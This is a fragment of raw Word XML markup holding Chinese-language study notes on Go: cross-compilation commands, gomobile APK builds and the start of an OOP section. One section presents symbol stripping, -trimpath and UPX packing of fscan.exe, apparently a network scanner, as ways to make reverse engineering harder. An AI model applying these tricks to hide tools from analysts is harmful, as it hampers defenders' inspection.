          <w:bCs/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FE3369" w14:textId="77777777" w:rsidR="001B2D88" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CGO_ENABLED=0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2821218D" w14:textId="77777777" w:rsidR="001B2D88" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GOOS=linux </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172359D5" w14:textId="77777777" w:rsidR="001B2D88" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GOARCH=amd64 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6179FEFF" w14:textId="5EF8FBE8" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20385DD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D740B52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Arm Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E30DF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGO_ENABLED=0 GOOS=linux GOARCH=arm go build filename.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9AEFDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF07077" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091738C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build filename.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA294C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643F1DE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MacOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A0F56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build filename.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DB44D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1113D6" w14:textId="05E443D5" w:rsidR="006554D9" w:rsidRDefault="006F1620" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="300" w:name="_Toc159779760"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无符号信息</w:t>
      </w:r>
      <w:r w:rsidR="006554D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：增加逆向难度</w:t>
      </w:r>
      <w:bookmarkEnd w:id="300"/>
    </w:p>
    <w:p w14:paraId="75016109" w14:textId="77777777" w:rsidR="006554D9" w:rsidRDefault="006554D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F99F005" w14:textId="747D1DE3" w:rsidR="006554D9" w:rsidRDefault="00CA048A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA048A">
        <w:t>https://www.anquanke.com/post/id/214940</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AAB402" w14:textId="77777777" w:rsidR="006554D9" w:rsidRDefault="006554D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59929F68" w14:textId="691130D2" w:rsidR="0040431E" w:rsidRDefault="00CD2EF3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言的编译工具链会全静态链接构建二进制文件，把标准库函数和第三方</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> package </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全部做了静态编译，再加上</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件中还打包进去了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> runtime </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GC(Garbage Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，垃圾回收</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块代码，所以即使做了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> strip </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>( go build -ldflags "-s -w" )</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，生成的二进制文件体积仍然很大。在反汇编工具中打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言二进制文件，可以看到里面包含动辄几千个函数。再加上</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言的独特的函数调用约定、栈结构和多返回值机制，使得对</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Go </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件的分析，无论是静态逆向还是动态调式分析，都比分析普通的二进制程序要困难很多。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BCD7B5" w14:textId="77777777" w:rsidR="0040431E" w:rsidRDefault="0040431E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB71375" w14:textId="57BD2338" w:rsidR="00CA048A" w:rsidRDefault="007E4C61" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C60138">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go build -ldflags "-s -w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A887A4D" w14:textId="6037F0E4" w:rsidR="00CA048A" w:rsidRPr="00AF4346" w:rsidRDefault="00AF4346" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C60138">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go build -ldflags "-s -w"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4346">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4346">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-trimpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741EEA78" w14:textId="77777777" w:rsidR="00AF4346" w:rsidRDefault="00AF4346" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8E56CD" w14:textId="5F10A055" w:rsidR="00DE484E" w:rsidRDefault="00DE484E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097287B1" w14:textId="4F9EFE1B" w:rsidR="00DE484E" w:rsidRDefault="00DE484E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C60138">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go build -ldflags "-w -s"  -o SecretDetection-lackOfOptimize.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC60265" w14:textId="47F5CD75" w:rsidR="00AF4346" w:rsidRPr="00AF4346" w:rsidRDefault="00AF4346" w:rsidP="00AF4346">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C60138">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go build -ldflags "-s -w"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4346">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4346">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-trimpath</w:t>
      </w:r>
      <w:r w:rsidRPr="00C60138">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  -o SecretDetection-lackOfOptimize.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A78C00" w14:textId="77777777" w:rsidR="006554D9" w:rsidRPr="00AF4346" w:rsidRDefault="006554D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB3D6D7" w14:textId="0525A7A5" w:rsidR="00BC1F23" w:rsidRDefault="00D9016D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9016D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>upx -9 fscan.exe (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9016D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可选</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9016D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9016D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩体积</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9016D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DC3F55" w14:textId="77777777" w:rsidR="00BC1F23" w:rsidRDefault="00BC1F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8D4C01" w14:textId="77777777" w:rsidR="00BC1F23" w:rsidRPr="00BC1F23" w:rsidRDefault="00BC1F23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6B2D71" w14:textId="77777777" w:rsidR="006554D9" w:rsidRDefault="006554D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DECA37B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="301" w:name="_Toc159779761"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包成安卓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gomobile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="301"/>
    </w:p>
    <w:p w14:paraId="1A486214" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E75C2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:bookmarkStart w:id="302" w:name="OLE_LINK34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://zhuanlan.zhihu.com/p/276102608" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://zhuanlan.zhihu.com/p/276102608</w:t>
      </w:r>
      <w:bookmarkEnd w:id="302"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C80C0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50834988" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行帮助参考：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://pkg.go.dev/golang.org/x/mobile/cmd/gomobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A8B528" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3A95B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/golang/mobile.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288DC986" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wiki: https://github.com/golang/go/wiki/Mobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6278D6E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D8F864" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令：在有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go.mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置执行如下命令，等待一段时间就会打包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBDEF11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>gomobile build -target=android -androidapi 19 ./</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478937BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762C4252" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF93CE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A1253B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1E29B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53323C4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="303" w:name="_Toc159779762"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：继承与派生</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
    </w:p>
    <w:p w14:paraId="49401703" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://blog.csdn.net/cbmljs/article/details/96275267</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF9B0B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63ABBD60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的面向对象（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）相当简单，本身基本没有构造函数和析构函数等魔术方法，而且成员方法可以设置是实例的参数还是实例指针的类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8CF78C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11019060" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义一个结构体，然后可以写其成员方法。成员方法前面声明的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>结构体对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>有指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则可以改变对象中的值，</w:t>
